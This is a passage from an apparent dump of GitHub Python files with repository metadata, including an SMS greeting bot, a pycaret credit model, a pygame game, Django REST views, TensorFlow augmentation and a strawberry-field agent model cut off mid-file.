晚-{evening_alarm_timed}\\n\"\n\n morning_dictum_channel = config.get('morning_dictum_channel', '')\n evening_dictum_channel = config.get('evening_dictum_channel', '')\n dictum_channels = [morning_dictum_channel, evening_dictum_channel]\n init_msg += f\"信息获取渠道:早-{morning_dictum_channel}, 晚-{evening_dictum_channel}\\n\\n\"\n\n text_emoji_file = config.get('text_emoji_file', '')\n init_msg += f\"text_emoji文件名:{text_emoji_file}\\n\"\n\n\n sms_list = []\n sms_infos = config.get('sms_infos')\n for sms_info in sms_infos:\n sms = {}\n phone_number_file = sms_info.get('phone_number_file').strip()\n sms[\"phone_numbers\"] = []\n with open(phone_number_file, \"r\") as file:\n raw_phone_numbers = file.readlines()\n for raw_phone_number in raw_phone_numbers:\n phone_number = raw_phone_number.strip()\n if(len(phone_number) > 0):\n sms[\"phone_numbers\"].append(phone_number)\n sms[\"gf_name\"] = sms_info.get('gf_name', '')\n sms[\"city_name\"] = sms_info.get('city_name', '')\n sms[\"start_date\"] = sms_info.get('start_date', '')\n sms[\"sweet_words\"] = sms_info.get('sweet_words', '')\n\n sms_list.append(sms)\n print_msg = f\"女朋友的手机号码:{str(sms['phone_numbers'])}\\n\" \\\n f\"女友所在地区:{sms['city_name']}\\n\" \\\n f\"在一起的第一天日期:{sms['start_date']}\\n\" \\\n f\"最后一句为:{sms['sweet_words']}\\n\\n\"\n init_msg += print_msg\n\n tx_api_key = ''\n bin_std_api_key = []\n try:\n with open(config.get('tx_api_key_file', 'no_config'), \"r\") as file:\n tx_api_key = file.readline()\n with open(config.get('bin_std_api_key_file', 'no_config'), \"r\") as file:\n bin_std_app_key = file.readline().strip()\n bin_std_secret_key = file.readline().strip()\n bin_std_api_key = [bin_std_app_key, bin_std_secret_key]\n except:\n print(\"获取 API Key 失败,文件打开失败!请检查是否存在配置文件中的 api_key_file...\\n\")\n\n init_msg += f\"tx_api_key:{tx_api_key}\\nbin_std_api_key:{str(bin_std_api_key)}\\n\"\n\n print(u\"*\" * 25 + \"init msg\" + u\"*\" * 25)\n print(init_msg)\n\n return sms_list, dictum_channels, text_emoji_file, tx_api_key, bin_std_api_key\n\n def start_today_info(self, chat_id, send_test=False):\n '''\n 每日定时开始处理。\n :param chat_id:int, 判断早晚安信息(0:早安,1:晚安)。\n :param send_test:bool, 测试标志,当为True时,不发送信息。\n :return: None。\n '''\n print(\"*\" * 20 + \"start_today_info\" + \"*\" * 20)\n print(\"chat_id:\", chat_id, \"send_test:\", send_test)\n print(\"获取相关信息...\")\n date_str = date.today().strftime('%Y-%m-%d')\n for sms in self.sms_list:\n days = (datetime.strptime(date_str, '%Y-%m-%d') - datetime.strptime(sms[\"start_date\"], '%Y-%m-%d')).days\n # 判断早安还是晚安\n if chat_id == 0:\n sms_msg = f\"{sms['gf_name']},今天是我们相恋的第{days}天!想你~\\n\"\n apis = self.zaoan_apis\n elif(chat_id == 1):\n sms_msg = f\"{sms['gf_name']},我们相恋的第{days}天就要结束啦!爱你~\\n\"\n apis = self.wanan_apis\n else:\n print(\"Wrong chat id!!!\")\n return\n # 构建短信\n for k in apis:\n if k == \"tianqi\":\n url = self.urls[k].format(self.tx_api_key, sms[\"city_name\"])\n else:\n url = self.urls[k].format(self.tx_api_key)\n sms_msg += self.get_url_info(url, k, \"./cache/\" + k + \"/\" + date_str + \".txt\")\n sms_msg += sms['sweet_words']\n sms_msg += self.get_text_emoji()\n # 发送短信\n if len(sms[\"phone_numbers\"]) <= 0:\n print(\"No Phone Number with msg:\", sms_msg)\n return\n else:\n phone_numbers = sms[\"phone_numbers\"][0]\n for phone_number in sms[\"phone_numbers\"][1:]:\n phone_numbers += \",\" + phone_number\n if not send_test:\n url = self.urls[\"sms\"].format(self.bin_std_api_key[0], phone_numbers, sms_msg)\n self.send_sms_with_url(url)\n print(f\"发送给{phone_numbers}成功:\\n\", sms_msg)\n return\n\n def get_url_info(self, url, k, file_path=\"\"):\n '''\n 获取url的返回值\n :param url: 请求地址\n :param k: 请求类型\n :param file_name: 缓存文件名\n :return: url返回值\n '''\n print(\"*\" * 10 + \"getting url info\" + \"*\" * 10)\n if(os.path.exists(file_path)):\n print(\"reading cache file: \", file_path)\n with open(file_path, \"r\") as file:\n content = json.load(file)\n else:\n print(\"request url: \", url)\n resp = requests.get(url)\n content = json.loads(resp.text)\n if content:\n print(content)\n with open(file_path, \"w\") as file:\n file.write(json.dumps(content))\n\n c = content['newslist'][0]\n if k == \"tianqi\":\n msg = f\"***天气预报来袭~~~\\n\" \\\n f\"***{c['date']} {c['week']}\\n\" \\\n f\"***今日{c['weather']}\\n\" \\\n f\"***气温{c['lowest']}/{c['highest']},当前气温{c['real']}\\n\" \\\n f\"***风力{c['windspeed']}\\n\" \\\n f\"***空气质量 {c['air_level']}\\n\"\n elif k == \"zaoan\":\n if \"早安\" in c[\"content\"]:\n msg = c[\"content\"] + \"\\n\"\n else:\n msg = \"早安~\\n\" + c[\"content\"] + \"\\n\"\n elif k == \"wanan\":\n if \"晚安\" in c[\"content\"]:\n msg = c[\"content\"] + \"\\n\"\n else:\n msg = c[\"content\"] + \"\\n晚安~\\n\"\n elif k == \"qinghua\":\n msg = c[\"content\"] + \"\\n\"\n else:\n msg = c[\"content\"] + \"\\n\"\n return msg\n\n def get_text_emoji(self):\n '''\n 随机获取一个 text emoji 作为结束标记\n :return: str text_emoji\n '''\n text_emoji = []\n with open(self.text_emoji_file, \"r\", encoding=\"utf-8\") as file:\n lines = file.readlines()\n for line in lines:\n if len(line) > 0:\n text_emoji.append(line)\n return random.choice(text_emoji)\n \n def send_sms_with_url(self, url):\n print(\"*\" * 10 + \"sending sms\" + \"*\" * 10)\n resp = requests.get(url)\n content = json.loads(resp.text)\n if content:\n print(content)\n\nif __name__ == '__main__':\n g = GFEverydaySMS()\n g.start_today_info(0, send_test=True)\n g.start_today_info(1, send_test=True)","repo_name":"Chaunhewie/EveryDaySMSGreet","sub_path":"GFEverydaySMS.py","file_name":"GFEverydaySMS.py","file_ext":"py","file_size_in_byte":8643,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"30020686663","text":"# %% \r\nfrom pycaret.datasets import get_data\r\ndataset = get_data('credit', profile=True)\r\n\r\n# %%\r\ndata = dataset.sample(frac=0.95, random_state=786).reset_index(drop=True)\r\ndata_unseen = dataset.drop(data.index).reset_index(drop=True)\r\n\r\nprint('Data for Modeling: ' + str(data.shape))\r\nprint('Unseen Data For Predictions ' + str(data_unseen.shape))\r\n\r\n# %%\r\nfrom pycaret.classification import *\r\n\r\n# %%\r\nexp_clf102 = setup(data = data, target = 'default', session_id=123,\r\n normalize = True, \r\n transformation = True, \r\n ignore_low_variance = True,\r\n remove_multicollinearity = True, multicollinearity_threshold = 0.95,\r\n bin_numeric_features = ['LIMIT_BAL', 'AGE'],\r\n group_features = [['BILL_AMT1', 'BILL_AMT2','BILL_AMT3', 'BILL_AMT4', 'BILL_AMT5', 'BILL_AMT6'],\r\n ['PAY_AMT1','PAY_AMT2', 'PAY_AMT3', 'PAY_AMT4', 'PAY_AMT5', 'PAY_AMT6']])\r\n\r\n# %%\r\ncompare_models()\r\n# %%\r\ntuned_rf = tune_model('rf')\r\ntuned_rf2 = tune_model('rf', optimize = 'AUC')\r\n\r\n# %%\r\n# lets create a simple decision tree model that we will use for ensembling \r\ndt = create_model('dt')\r\n\r\n# %%\r\nbagged_dt = ensemble_model(dt)\r\n\r\n# %%\r\nboosted_dt = ensemble_model(dt, method = 'Boosting')\r\n\r\n# %%\r\ntuned_bagged_dt = tune_model('dt', ensemble=True, method='Bagging')\r\n\r\n# %%\r\n","repo_name":"anarinsk/tor-pycaret","sub_path":"clf-102.py","file_name":"clf-102.py","file_ext":"py","file_size_in_byte":1385,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"6225014042","text":"from PyQt5.Qt import *\nimport sys\n\nclass Window(QWidget):\n\n def __init__(self):\n super(Window, self).__init__()\n self.QObject()\n\n def QObject(self):\n\n lable1 = QLabel(self)\n lable1.move(100,100)\n lable1.setText('第一关文本控件')\n lable2 = QLabel(self)\n lable2.move(200, 200)\n lable2.setText('第二个文本控件')\n bin = QPushButton(self)\n bin.move(300,300)\n bin.setText(\"点我\")\n\n for i in self.findChildren(QLabel):\n print(i)\n\n\nif __name__ == \"__main__\":\n app = QApplication(sys.argv)\n window = Window()\n window.show()\n sys.exit(app.exec())","repo_name":"ywkangkai/PythonGUI","sub_path":"GUI/类型判定/通过findchildern找到窗口下的子控件.py","file_name":"通过findchildern找到窗口下的子控件.py","file_ext":"py","file_size_in_byte":665,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"18630489605","text":"import sys\n\nN = int(input())\n\nChecklist = [0] * 10001\n\nfor i in range(N):\n x = int(sys.stdin.readline())\n Checklist[x] = Checklist[x] + 1\n\nfor i in range(10001):\n if Checklist[i] != 0:\n for j in range(Checklist[i]):\n print(i)","repo_name":"junyeong-youn/Jungle_feat.JY","sub_path":"Algorithm/WEEK01/32.py","file_name":"32.py","file_ext":"py","file_size_in_byte":252,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"26911735309","text":"import pygame as pg\nimport random\nimport sys\nimport tkinter.messagebox as tkm\nimport tkinter as tk\nimport time\n\n\n\n\n\nclass Screen:\n def __init__(self, title, wh, img_path):\n pg.display.set_caption(title) \n self.sfc = pg.display.set_mode(wh)\n self.rct = self.sfc.get_rect()\n self.bgi_sfc = pg.image.load(img_path)\n self.bgi_rct = self.bgi_sfc.get_rect() \n\n def blit(self):\n self.sfc.blit(self.bgi_sfc, self.bgi_rct) \n\n\nclass Bird:\n key_delta = {\n pg.K_UP: [0, -1],\n pg.K_DOWN: [0, +1],\n pg.K_LEFT: [-1, 0],\n pg.K_RIGHT: [+1, 0],\n }\n\n def __init__(self, img_path, ratio, xy):\n self.sfc = pg.image.load(img_path)\n self.sfc = pg.transform.rotozoom(self.sfc, 0, ratio)\n self.rct = self.sfc.get_rect()\n self.rct.center = xy\n\n def blit(self, scr:Screen):\n scr.sfc.blit(self.sfc, self.rct)\n\n def update(self, scr:Screen):\n key_dct = pg.key.get_pressed()\n for key, delta in Bird.key_delta.items():\n if key_dct[key]:\n self.rct.centerx += delta[0]\n self.rct.centery += delta[1] \n if check_bound(self.rct, scr.rct) != (+1, +1):\n self.rct.centerx -= delta[0]\n self.rct.centery -= delta[1]\n self.blit(scr) \n #def gunpos(self): 実装できなった\n #pos = self.facing * self.gun_offset + self.rect.centerx\n #return pos, self.rect.top \n\n\nclass Bomb:\n def __init__(self, color, rad, vxy, scr:Screen):\n self.sfc = pg.Surface((2*rad, 2*rad)) # 正方形の空のSurface\n self.sfc.set_colorkey((0, 0, 0))\n pg.draw.circle(self.sfc, color, (rad, rad), rad)\n self.rct = self.sfc.get_rect()\n self.rct.centerx = random.randint(0, scr.rct.width)\n self.rct.centery = random.randint(0, scr.rct.height)\n self.vx, self.vy = vxy\n\n def blit(self, scr:Screen):\n scr.sfc.blit(self.sfc, self.rct)\n\n def update(self, scr:Screen):\n self.rct.move_ip(self.vx, self.vy)\n yoko, tate = check_bound(self.rct, scr.rct)\n self.vx *= yoko\n self.vy *= tate\n self.blit(scr)\n\nclass Enemy:\n def __init__(self, img_path1, ratio, xy,vxy, scr:Screen):\n self.sfc = pg.image.load(img_path1)\n self.sfc = pg.transform.rotozoom(self.sfc, 0, ratio)\n self.rct = self.sfc.get_rect()\n self.rct.center = xy\n self.vx, self.vy = vxy\n\n def blit(self, scr:Screen):\n scr.sfc.blit(self.sfc, self.rct)\n\n def update(self, scr:Screen):\n self.rct.move_ip(self.vx, self.vy)\n yoko, tate = check_bound(self.rct, scr.rct)\n self.vx *= yoko\n self.vy *= tate\n self.blit(scr)\n#class Shot(pg.sprite.Sprite):\n #攻撃する\n\n #speed = -11\n #images = []\n\n #def __init__(self, pos):\n #pg.sprite.Sprite.__init__(self, self.containers)\n #self.image = self.images[0]\n #self.rect = self.image.get_rect(midbottom=pos)\n\n #def update(self):\n \n #self.rect.move_ip(0, self.speed)\n #if self.rect.top <= 0:\n #self.kill()\n\n \n\n\ndef check_bound(obj_rct, scr_rct):\n \"\"\"\n 第1引数:こうかとんrectまたは爆弾rect\n 第2引数:スクリーンrect\n 範囲内:+1/範囲外:-1\n \"\"\"\n yoko, tate = +1, +1\n if obj_rct.left < scr_rct.left or scr_rct.right < obj_rct.right:\n yoko = -1\n if obj_rct.top < scr_rct.top or scr_rct.bottom < obj_rct.bottom:\n tate = -1\n return yoko, tate\n\n\ndef main():\n clock =pg.time.Clock()\n\n # 練習1\n scr = Screen(\"逃げろ!こうかとん\", (1600,900), \"fig/pg_bg.jpg\")\n\n # 練習3\n kkt = Bird(\"fig/6.png\", 2.0, (900,400))\n kkt.update(scr)\n\n vx = random.choice([-1,+1])\n vy = random.choice([-1,+1])\n emy = Enemy(\"fig/alien1.png\", 2.0, (300,200),(vx,vy),scr)\n emy.update(scr)\n\n # 練習5\n bkd_lst = [] #爆弾を5個生成\n bombs = []\n colors = [\"red\",\"green\",\"blue\",\"yellow\",\"magenta\"]\n for i in range(5):\n color = colors[i]\n vx = random.choice([-1,+1])\n vy = random.choice([-1,+1])\n bombs.append(Bomb(color,10,(vx,vy),scr))\n \n #bkd = Bomb((255, 0, 0), 10, (+1, +1), scr)\n #bkd.update(scr)\n \n # 練習2\n while True: \n scr.blit()\n\n for event in pg.event.get():\n if event.type == pg.QUIT:\n return\n \n kkt.update(scr)\n for bomb in bombs:\n #爆弾を5個生成\n bomb.update(scr)\n if kkt.rct.colliderect(bomb.rct):\n root = tk.Tk()\n root.withdraw()\n tkm.showinfo(\"ドンマイ\",\"Game Over\")#コメントを表示\n return\n if kkt.rct.colliderect(emy.rct):\n root = tk.Tk()\n root.withdraw()\n tkm.showinfo(\"ドンマイ\",\"Game Over\")#コメントを表示\n return\n\n pg.display.update()\n clock.tick(1000)\n\n\nif __name__ == \"__main__\":\n pg.init()\n main()\n pg.quit()\n sys.exit()\n","repo_name":"yuki21168/ProjExD","sub_path":"ex05/fight_kokaton.py","file_name":"fight_kokaton.py","file_ext":"py","file_size_in_byte":5138,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"9470934758","text":"from bs4 import BeautifulSoup as bs\nimport os\n\n# return baseurl\n# e.g., '/' if local, '~yixuezhao' if on my server\ndef get_baseurl_from_config():\n config_file = 'config/_default/config.toml'\n with open(config_file) as file:\n for line in file:\n if 'baseurl' in line and not '#' in line:\n baseurl = line.split('\\\"')[1]\n return baseurl.replace('/', '')\n\n# filepath: public/mentoring/index.html\n# baseurl: ~yixuezhao\n# path_to_update: 'js/load-photoswipe.js'\ndef add_baseurl_to_html(filepath, baseurl):\n # Open the HTML in which you want to make changes\n html = open(filepath)\n # Parse HTML file in Beautiful Soup\n soup = bs(html, 'html.parser')\n\n # update '/js/load-photoswipe.js'\n old_text = soup.find('script', {'src': '/js/load-photoswipe.js'})\n if old_text is None:\n raise ValueError('/js/load-photoswipe.js', 'not found, please check file:', filepath)\n new_text = '/' + os.path.join(baseurl, 'js/load-photoswipe.js')\n # replace old text with new text\n old_text['src'] = new_text\n\n # update '/css/hugo-easy-gallery.css'\n old_text = soup.find('link', {'href': '/css/hugo-easy-gallery.css'})\n if old_text is None:\n raise ValueError('/css/hugo-easy-gallery.css', 'not found, please check file:', filepath)\n new_text = '/' + os.path.join(baseurl, 'css/hugo-easy-gallery.css')\n # replace old text with new text\n old_text['href'] = new_text\n\n # Alter HTML file to see the changes done\n with open(filepath, 'wb') as f_output:\n f_output.write(soup.prettify(\"utf-8\"))\n \n print('Done! :) replaced file', filepath)\n \n\n\n\nif __name__ == '__main__':\n baseurl = get_baseurl_from_config()\n print('baseurl is:', baseurl)\n add_baseurl_to_html('public/mentoring/index.html', baseurl)\n add_baseurl_to_html('public/misc/index.html', baseurl)\n\n ","repo_name":"felicitia/HugoAcademicWebsite","sub_path":"yixue_script.py","file_name":"yixue_script.py","file_ext":"py","file_size_in_byte":1877,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"2602224264","text":"import os\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'\n\nimport sys\nimport yaml\nimport tensorflow as tf\nimport matplotlib.pyplot as plt\nimport cv2\nimport numpy as np\nimport dataset\n\ndef plot_image_grid(images, ncols=None, cmap='gray'):\n '''Plot a grid of images'''\n if not ncols:\n factors = [i for i in range(1, len(images)+1) if len(images) % i == 0]\n ncols = factors[len(factors) // 2] if len(factors) else len(images) // 4 + 1\n nrows = int(len(images) / ncols) + int(len(images) % ncols)\n imgs = [images[i] if len(images) > i else None for i in range(nrows * ncols)]\n f, axes = plt.subplots(nrows, ncols, figsize=(3*ncols, 2*nrows))\n axes = axes.flatten()[:len(imgs)]\n for img, ax in zip(imgs, axes.flatten()): \n if np.any(img):\n if len(img.shape) > 2 and img.shape[2] == 1:\n img = img.squeeze()\n ax.axis('off')\n ax.imshow(img, cmap=cmap)\n plt.show()\n#base_path = '/home/maanvi/LAB/Datasets'\nbase_path = r'D:\\01_Maanvi\\LABB\\datasets'\nphase = 'dc'\n#path = os.path.join(base_path,'kt_new_trainvaltest',phase,'5CV/allSubjectPaths0.yaml')\npath = os.path.join(base_path,'kt_new_trainvaltest','fold1',phase,'allSubjectPaths1.yaml')\nwith open(path, 'r') as file:\n data = yaml.safe_load(file)\n subject_path = data['train'][10]\n\nprint(subject_path)\n\nimg_file = os.path.join(subject_path,phase,'1.png')\nimg = cv2.imread(img_file)\n#plt.imshow(img)\n#plt.show()\nlabel = 0\noutput_size = (224,224)\naug_functions = [\n dataset.flip_leftright,\n # dataset.rotate90,\n # dataset.rotate180,\n # dataset.rotate270,\n # dataset.up_rotate90,\n # dataset.up_rotate180,\n # dataset.up_rotate270,\n # dataset.random_horizontalflip,\n # dataset.random_verticalflip,\n # dataset.random_rotation,\n # dataset.random_brightness,\n]\n\nimages = []\nadd = True\nfor aug in aug_functions:\n image = dataset.parse_subject(subject_path, output_size, [phase], tumor_region_only=True)[phase]['1']\n image = tf.image.convert_image_dtype(image, dtype=tf.float32)\n if add:\n images.append(image)\n add = False\n image = tf.expand_dims(image, axis=-1)\n image = tf.repeat(image, repeats=[3],axis=-1)\n images.append(aug(image,label)[0])\n # plt.imshow(image,cmap=\"gray\")\n # plt.show()\n\nplot_image_grid(images)","repo_name":"nunna-m/KidneyTumorClassification","sub_path":"ktc/old_files/visualize_aug.py","file_name":"visualize_aug.py","file_ext":"py","file_size_in_byte":2313,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23409570631","text":"def do_trick(inf):\n\tfirst = []\n\tsecond = []\n\tr1 = int(inf.readline())\n\tfor i in xrange(1, 5):\n\t\ts = inf.readline().strip()\n\t\tif (i == r1):\n\t\t\tfirst += s.split()\n\tr2 = int(inf.readline())\n\tfor i in xrange(1, 5):\n\t\ts = inf.readline().strip()\n\t\tif (i == r2):\n\t\t\tsecond += s.split()\n\tres = set(first) & set(second)\n\tif len(res) == 1:\n\t\treturn list(res)[0]\n\telif len(res) == 0:\n\t\treturn \"Volunteer cheated!\"\n\telse:\n\t\treturn \"Bad magician!\"\n\n\ninf = open(\"in.txt\", 'r')\nt = int(inf.readline())\nres = \"\"\nfor i in xrange(0, t):\n\tres += \"Case #\" + str(i + 1) + \": \" + do_trick(inf) + \"\\n\"\noutf = open(\"out.txt\", 'w')\noutf.write(res)\noutf.close()\n\t\n\t\t\t\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_135/1033.py","file_name":"1033.py","file_ext":"py","file_size_in_byte":642,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"38094667863","text":"import numpy as np\nimport tensorflow as tf\nfrom keras import Sequential\n\nfrom models.base_model import BaseModel\n\n\nclass NeuralNet(BaseModel):\n \"\"\"Neural network model built using TensorFlow Keras and optimizer Adam.\"\"\"\n\n def __init__(self):\n super().__init__()\n self.model: Sequential = None\n\n def fit(self, X_train, y_train, layers, validation_split=0.2, epochs=200):\n \"\"\"Train the neural network on data X_train and targets y_train.\n\n Args:\n X_train: Input data for training\n y_train: Target values for training\n layers: List of layer widths\n validation_split: Validation set fraction of training data\n epochs: Number of training epochs\n \"\"\"\n model = tf.keras.Sequential()\n model.add(tf.keras.layers.Input(shape=(X_train.shape[1],)))\n\n for layer_size in layers:\n model.add(tf.keras.layers.Dense(layer_size, activation=\"relu\", kernel_initializer=\"he_normal\",\n ))\n\n output_dim = 1 if np.ndim(y_train) == 1 else y_train.shape[1]\n model.add(tf.keras.layers.Dense(output_dim, kernel_initializer=\"he_normal\",\n ))\n\n model.compile(optimizer=\"adam\", loss=\"mse\")\n\n model.fit(\n X_train,\n y_train,\n validation_split=validation_split,\n epochs=epochs,\n verbose=1,\n )\n\n self.model = model\n\n # Extract weights and biases\n self.weights = [layer.get_weights()[0] for layer in model.layers]\n self.biases = [-layer.get_weights()[1] for layer in model.layers]\n\n def resume_training(self, X_train, y_train, initial_epoch=0, epochs=200, validation_split=0.2):\n self.model.fit(\n X_train,\n y_train,\n validation_split=validation_split,\n initial_epoch=initial_epoch,\n epochs=epochs,\n verbose=0,\n )\n\n # Extract weights and biases\n self.weights = [layer.get_weights()[0] for layer in self.model.layers]\n self.biases = [-layer.get_weights()[1] for layer in self.model.layers]\n","repo_name":"DhiaBou/sampled-networks","sub_path":"models/neural_net.py","file_name":"neural_net.py","file_ext":"py","file_size_in_byte":2184,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"22439688320","text":"import pandas as pd\nimport plotly.graph_objs as go\nimport plotly as py\nimport config\n\npe_mmvb = pd.read_csv(r'app\\static\\tables\\funds2.csv', delimiter=';', decimal=',', parse_dates=True, dayfirst=True, index_col=0, encoding='latin1')\n\ntrace_pe_mmvb_pe = go.Scatter(\n x=pe_mmvb.index,\n y=pe_mmvb['PE_PE'],\n showlegend=True,\n name='P/E',\n marker=dict(color='orange'),\n yaxis='y1')\n\ntrace_pe_mmvb_consensus = go.Scatter(\n x=pe_mmvb.index,\n y=pe_mmvb['PE_TARGET'],\n showlegend=True,\n name='P/E consensus',\n marker=dict(color='teal'),\n yaxis='y1')\n\ndata = [trace_pe_mmvb_pe, trace_pe_mmvb_consensus]\n\nlayout = go.Layout(title='P/E индекса ММВБ-10',\n font=dict(size=config.LAYOUT_FONT_SIZE),\n legend=dict(\n orientation='h'\n ),\n xaxis=dict(tickformat='%m.%y', dtick=\"M1\"),\n width=config.STOCKS_2_WIDTH,\n height=config.STOCKS_2_HEIGHT,\n margin=config.MARGINS\n )\n\nfig = go.Figure(data=data, layout=layout)\nconfig={'showLink': False}\npy.offline.plot(fig, filename=r'app\\templates\\pe_mmvb.html', auto_open=False, config=config)","repo_name":"ogladkov/oofr_research","sub_path":"pe_mmvb.py","file_name":"pe_mmvb.py","file_ext":"py","file_size_in_byte":1229,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"30595940544","text":"from . import models\nfrom rest_framework import generics, permissions\n\n# Create your views here.\nfrom .serializers import ArticleSerializer\n\n\nclass ArticlesListView(generics.ListAPIView):\n queryset = models.Article.objects.all()\n serializer_class = ArticleSerializer\n permission_classes = (permissions.AllowAny,)\n\n\nclass ArticleDetailView(generics.RetrieveAPIView):\n serializer_class = ArticleSerializer\n\n def get_queryset(self):\n user = self.kwargs[\"user\"]\n return models.Article.objects.filter(user=user)\n\n\nclass ArticleCreateView(generics.CreateAPIView):\n queryset = models.Article.objects.all()\n serializer_class = ArticleSerializer\n permission_classes = (permissions.IsAuthenticated,)\n\n def perform_create(self, serializer):\n serializer.save(author=self.request.user)\n\n\nclass ArticleEditView(generics.RetrieveUpdateAPIView):\n queryset = models.Article.objects.all()\n serializer_class = ArticleSerializer\n permission_classes = (permissions.IsAuthenticated,)\n\n def get_queryset(self):\n user = self.request.user\n return models.Article.objects.filter(author=user)\n\n\nclass ArticleFilterView(generics.ListAPIView):\n serializer_class = ArticleSerializer\n permission_classes = (permissions.AllowAny, )\n\n def get_queryset(self):\n article_type = self.kwargs[\"article_type\"]\n return models.Article.objects.filter(article_type=article_type,\n article_status=\"published\")\n\n\nclass ArticleDeleteView(generics.RetrieveDestroyAPIView):\n queryset = models.Article.objects.all()\n serializer_class = ArticleSerializer\n permission_classes = (permissions.IsAuthenticated,)\n\n def get_queryset(self):\n user = self.request.user\n return models.Article.objects.filter(author=user)\n","repo_name":"PatrickBoynton/news-app","sub_path":"articles/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1825,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"35612739371","text":"class Node:\n left = right = None\n\n def __init__(self,data):\n self.data = data\n\n\ndef mirror(node):\n '''Mirrors the given binary tree'''\n if node:\n # mirror the left sub tree recursively\n mirror(node.left)\n # mirror the right sub tree recursively\n mirror(node.right)\n # Swap the left and right nodes\n node.left, node.right = node.right, node.left\n\n\ndef in_order_traversal(node):\n '''Visit the nodes using in order traversal'''\n if node:\n in_order_traversal(node.left)\n print(node.data, end=' ')\n in_order_traversal(node.right)\n\n\n# Constructing the tree\nroot = Node(1)\nroot.left = Node(3)\nroot.right = Node(5)\nroot.left.left = Node(7)\nroot.left.right = Node(9)\n\n\nprint('Inorder traversal of the Tree before mirroring: ')\nin_order_traversal(root)\n# 1 3 5 7 9\n\nprint('\\nMirroring the Tree\\n')\nmirror(root)\n\nprint('Inorder traversal of the Tree after mirroring: ')\nin_order_traversal(root)\n# 1 5 3 9 7","repo_name":"Kalki5/DSA-Assignment","sub_path":"1_mirror_of_binary_tree.py","file_name":"1_mirror_of_binary_tree.py","file_ext":"py","file_size_in_byte":982,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"41191753703","text":"import FWCore.ParameterSet.Config as cms\n\nhltDisplacedtktkFilter = cms.EDFilter('HLTDisplacedtktkFilter',\n saveTags = cms.bool(True),\n FastAccept = cms.bool(False),\n MinLxySignificance = cms.double(0),\n MaxLxySignificance = cms.double(0),\n MaxNormalisedChi2 = cms.double(10),\n MinVtxProbability = cms.double(0),\n MinCosinePointingAngle = cms.double(-2),\n triggerTypeDaughters = cms.int32(0),\n DisplacedVertexTag = cms.InputTag('hltDisplacedtktkVtx'),\n BeamSpotTag = cms.InputTag('hltOnlineBeamSpot'),\n TrackTag = cms.InputTag('hltL3MuonCandidates'),\n mightGet = cms.optional.untracked.vstring\n)\n","repo_name":"cms-sw/cmssw-cfipython","sub_path":"HLTrigger/btau/hltDisplacedtktkFilter_cfi.py","file_name":"hltDisplacedtktkFilter_cfi.py","file_ext":"py","file_size_in_byte":607,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"18809232163","text":"import exceptions\nfrom vehicle import Vehicle\n\n\nclass Plane(Vehicle):\n cargo = 10\n max_cargo = int\n\n def __init__(self, weight=None, fuel=None, fuel_consumption=None, max_cargo=100):\n super().__init__(weight, fuel, fuel_consumption)\n self.max_cargo = max_cargo\n\n def load_cargo(self, value):\n cargo_total = self.cargo + value\n if cargo_total <= self.max_cargo:\n self.cargo = cargo_total\n else:\n raise exceptions.CargoOverload()\n\n def remove_all_cargo(self):\n cargo_before = self.cargo\n self.cargo = 0\n return cargo_before\n","repo_name":"victorfomenko/ml","sub_path":"hw-2/plane.py","file_name":"plane.py","file_ext":"py","file_size_in_byte":615,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"20928298367","text":"\nimport mesa\nimport math \nimport random \nimport numpy\n\nfrom shapely.geometry import Point, Polygon\nfrom shapely.affinity import translate,rotate \n\nfrom pickers_model.strawberry_field.topological_map import TMNode,TMEdge,TopologicalMap\n\nclass PolytunnelRow : \n \n def __init__( self, polytunnel, i ): \n \n self.polytunnel = polytunnel\n self.i = i\n self.assigned_pickers = [] \n self.fruit_yield = self.polytunnel.fruit_yield \n self.length = self.polytunnel.length\n \n self.nodes = [] \n \n #Portion picked -- as pickers pick, the value goes up. Starts at 0.0, ends with 1.0. \n self.fruit_picked = 0.0 \n self.fruit_picked_portion = 0.0 \n \n self.entrance_xy_point = None \n self.end_xy_point = None \n \n self.entrance_node = None\n \n def pick( self, amount ): \n \n self.fruit_picked += amount\n self.fruit_picked_portion = self.fruit_picked / self.fruit_yield \n if self.fruit_picked >= self.fruit_yield:\n self.fruit_picked = self.fruit_yield \n self.fruit_picked_portion = 1.0 \n \n def add_nodes( self, topological_map, number_of_nodes = 50 ): \n entrance_x,entrance_y = self.entrance_xy_point.x,self.entrance_xy_point.y\n end_x, end_y = self.end_xy_point.x,self.end_xy_point.y\n points = zip ( numpy.linspace( entrance_x, end_x, number_of_nodes ), numpy.linspace( entrance_y, end_y, number_of_nodes ) )\n \n self.nodes = [ TMNode( px,py ) for px,py in points ]\n self.entrance_node = self.nodes[0] \n for n in self.nodes:\n topological_map.add_node( n )\n \n for n0,n1 in zip( self.nodes, self.nodes[1:] ):\n topological_map.add_edge( n0,n1 )\n \n def find_picking_node( self ):\n \n #Find picking point\n entrance_x,entrance_y = self.entrance_xy_point.x,self.entrance_xy_point.y\n end_x,end_y = self.end_xy_point.x,self.end_xy_point.y\n #print( 'Entrance: ', entrance_x,entrance_y, 